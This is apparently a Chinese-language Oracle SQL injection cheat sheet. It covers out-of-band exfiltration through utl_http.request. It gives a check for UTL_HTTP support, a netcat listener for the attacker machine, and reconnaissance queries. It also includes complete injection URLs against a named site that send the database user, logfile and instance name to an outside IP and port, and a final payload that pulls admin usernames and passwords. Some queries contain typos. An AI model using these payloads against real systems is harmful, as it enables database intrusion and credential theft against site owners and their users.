[TOC] ## utl_http.request注入 通过 ``` utl_http.request ``` 我们可以将查询的结果发送到远程服务器上，一般用在盲注，但是需要使用该方法的用户需要具有utl_http访问网络的权限。 ## 检测是否支持utl\_http.request ~~~ and exists (select concat(*) from all_objects where object_name='UTL_HTTP') --+ ~~~ ## 反弹注入 ~~~ 目标网站 and utl_http.request(’http://域名或者IP:端口/‘||(注入的语句))=1 --+ 攻击机 nc -vvlp 端口号 ~~~ ## 常用查询 1 当前用户 ``` select user from aual ``` 2 当前数据库版本 ``` select banner from sys.v_$version where rownum=1 ``` 3 服务器出口IP ``` 用utl_http.request 可以实现 ``` 4 服务器监听IP ``` select utl_inaddr.get_host_address from dual ``` 5 日志文件 ``` select member from v$logfile where rownum=l ``` 6 服务器sid 远连接的话需要 ``` select instance_name from v$instance ``` 7 当前连接用户 ``` select SYS_CONTEXT ('USERENV', 'CURRENT_USER')from dual ``` 查询系统用户 ~~~ http://www.jsporcle.com/news.jsp?id=1 and%20 utl_http.request('http://192.168.0.121:2008/'%7c%7c (select user from dual))=1-- ~~~ ~~~ http://www.jsporcle.com/news.jsp?id=1 and%20 utl_http.request('http://192.168.0.121:2008/'%7c%7c(select member from v$logfile where rownum =1))=1-- ~~~ ~~~ http://www.jsporcle.com/news.jsp?id=1%20and%20%20utl_http.request(%27http://192.16 8.0.121:2008/%27%7c%7c(select%20instance_name%20from%20v$instance))=1-- ~~~ ## 查询admin账户密码 ``` utl_http.request('http://192.168.0.121:2008/'%7c%7c ( select username%7c%7cpassword from admin ) )=1 -- ```